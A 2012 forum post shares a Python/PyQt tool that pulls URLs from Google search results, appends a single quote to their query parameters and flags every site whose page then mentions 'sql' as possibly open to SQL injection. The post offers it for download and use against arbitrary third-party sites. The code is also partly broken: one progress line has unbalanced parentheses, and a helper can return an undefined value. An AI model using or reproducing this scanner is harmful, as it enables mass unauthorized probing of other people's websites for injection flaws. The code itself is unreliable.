Pages: [1]

Author Topic: [Python] Basic SQL vuln search  (Read 1208 times)

0 Members and 1 Guest are viewing this topic.

Offline relax

  • Sir
  • ***
  • Posts: 562
  • Cookies: 114
  • The one and only
    • View Profile
[Python] Basic SQL vuln search
« on: September 07, 2012, 12:04:25 am »
So i decided to try out python, usually i am a java guy
I don't know if its because i am a total noob in python or if its actually harder then java.
anyhow i made a small program with gui that searches google for possible SQL injection vulnerability's
i know functions like this already exists in programs like sqlmap but it this was more a fun startup project for my learning in python. well i thought i would share :)

Code: [Select]
import sys
import urllib, urllib2
import simplejson
import time
from PyQt4 import QtCore, QtGui
from gui import Ui_MainWindow
from array import *
global x
global gp
x = 0
pg = 0

class BSQLS(QtGui.QMainWindow):
  def __init__(self, parent=None):
    QtGui.QWidget.__init__(self, parent)
    self.ui = Ui_MainWindow()
    self.ui.setupUi(self)
    self.ui.go.clicked.connect(self.get_data)
    self.ui.clear.clicked.connect(self.ui.txt.clear)
   
  def get_data(self):
    antres = int(self.ui.star.text())+1
    global x
    global pg
    x = 0
    if str(self.ui.txt.toPlainText()).find('Welcome') != -1: self.ui.txt.setText('')
    start = 1
    for i in xrange(start,antres):
      pg =  i
      if i != start:
        self.ui.status.setText('Status: waiting 10sec so we dont piss off google')
        app.processEvents()
        time.sleep(10)
      try:
        start2 = (i - 1) * 8
        usock = urllib.urlopen('http://ajax.googleapis.com/ajax/services/search/web?v=1.0&q=%s&start=%d&rsz=8' % (self.ui.search.text(), start2))
        data = usock.read()       
        json = simplejson.loads(data)
        usock.close()
        results = json['responseData']['results']
        foundsites = []
        for g in results:
          found = str(urllib.unquote(str(g['url'])))
          foundsites.append(found)
        self.check(foundsites)
      except:
        self.ui.status.setText('Status: Something went wrong when trying to get data from google')
        app.processEvents()
    self.ui.status.setText('Status: search completed')
    self.ui.txt.append('Found %d possible vulnerable sites' % x)
     
  def check(self, site):
    newurl = []
    global x
    global pg
    for i in xrange(0,8):
      ii = i+1
      newurl.append(self.replace_all(site[i],'='))
      usock = urllib.urlopen(newurl[i])
      data = str.lower(usock.read())
      tal = (((pg-1)*+i+1) / (float(self.ui.star.text())**100
      self.ui.status.setText('Status: searching...                                          %d %s' % (tal, u"\u0025"))
      app.processEvents()
      usock.close()
      if data.find('sql') != -1:
        self.ui.txt.append(newurl[i])
        app.processEvents()
        x = x + 1

  def replace_all(self, s, key):
    start = 0
    while True:
      nr = s.find(key,start)
      if(nr==-1):
        return f
      else:
        start += len(key)
        f = s[:nr-len(s)+1] + '\'' + s[nr+1:len(s)]

if __name__ == '__main__':
  app = QtGui.QApplication(sys.argv)
  myapp = BSQLS()
  myapp.show()
  sys.exit(app.exec_())

Changed some code so its more stable now. don't get errors from google anymore
Enjoy

Download
« Last Edit: September 07, 2012, 05:38:46 pm by relax »
Report to moderator   Logged
Pages: [1]